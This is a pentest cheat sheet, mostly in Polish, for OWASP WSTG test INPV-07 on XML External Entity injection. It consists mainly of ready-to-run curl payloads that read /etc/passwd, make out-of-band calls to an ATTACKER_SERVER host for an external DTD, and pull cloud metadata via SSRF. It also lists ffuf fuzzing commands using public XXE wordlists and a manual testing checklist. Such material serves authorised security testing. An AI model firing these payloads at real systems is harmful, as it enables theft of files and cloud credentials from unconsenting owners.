================================================================================
WSTG-INPV-07 — Testing for XML Injection (XXE)
================================================================================
CELE:
- Identify XML injection points
- Assess the types of exploits that can be attained and their severities

================================================================================
KOMENDY
================================================================================

# --- Testowanie XXE - odczyt plikow ---
curl -X POST "https://TARGET/api/xml" -H "Content-Type: application/xml" -d '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root>'

# --- XXE blind (Out-of-Band) ---
curl -X POST "https://TARGET/api/xml" -H "Content-Type: application/xml" -d '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://ATTACKER_SERVER/xxe">]><root>&xxe;</root>'

# --- XXE z parametrycznymi entities ---
curl -X POST "https://TARGET/api/xml" -H "Content-Type: application/xml" -d '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://ATTACKER_SERVER/evil.dtd">%xxe;]><root>test</root>'

# --- XXE SSRF ---
curl -X POST "https://TARGET/api/xml" -H "Content-Type: application/xml" -d '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">]><root>&xxe;</root>'

# --- Test JSON to XML conversion ---
curl -X POST "https://TARGET/api/data" -H "Content-Type: application/xml" -d '<?xml version="1.0"?><root>test</root>'

================================================================================
KOMENDY Z WORDLISTAMI
================================================================================

# --- PayloadsAllTheThings XXE payloads ---
# Wordlista: Desktop/WSTG/PayloadsAllTheThings-master/XXE Injection/Intruders/XXE_Fuzzing.txt
# Wordlista: Desktop/WSTG/PayloadsAllTheThings-master/XXE Injection/Intruders/xml-attacks.txt

ffuf -u "https://TARGET/api/xml" -X POST -H "Content-Type: application/xml" -d "FUZZ" -w "Desktop/WSTG/PayloadsAllTheThings-master/XXE Injection/Intruders/XXE_Fuzzing.txt" -mc all -o output_ffuf_xxe.json

# --- SecLists XXE ---
ffuf -u "https://TARGET/api/xml" -X POST -d "FUZZ" -w Desktop/WSTG/SecLists-master/Fuzzing/XXE-Fuzzing.txt -mc all -o output_ffuf_seclists_xxe.json

# --- SecLists XML Fuzz ---
ffuf -u "https://TARGET/api/xml" -X POST -d "FUZZ" -w Desktop/WSTG/SecLists-master/Fuzzing/XML-FUZZ.txt -mc all -o output_ffuf_xml_fuzz.json

# --- fuzzdb XML ---
# Referencja: Desktop/WSTG/fuzzdb-master/attack/xml/

# --- PayloadsAllTheThings szczegolowa dokumentacja ---
# Referencja: Desktop/WSTG/PayloadsAllTheThings-master/XXE Injection/README.md

================================================================================
WERYFIKACJA MANUALNA (Burp Suite / Przegladarka / DevTools)
================================================================================
1. Zidentyfikuj endpointy przyjmujace XML (Content-Type: application/xml)
2. Sprawdz file upload (DOCX, XLSX, SVG - zawieraja XML)
3. Testuj XXE do odczytu /etc/passwd lub C:\Windows\win.ini
4. Testuj blind XXE z zewnetrznym serwerem (Burp Collaborator)
5. Sprawdz SSRF via XXE (dostep do metadanych chmury)
6. Testuj wstrzykiwanie w SOAP/WSDL endpointach
7. Sprawdz czy Content-Type: application/json mozna zmienic na XML
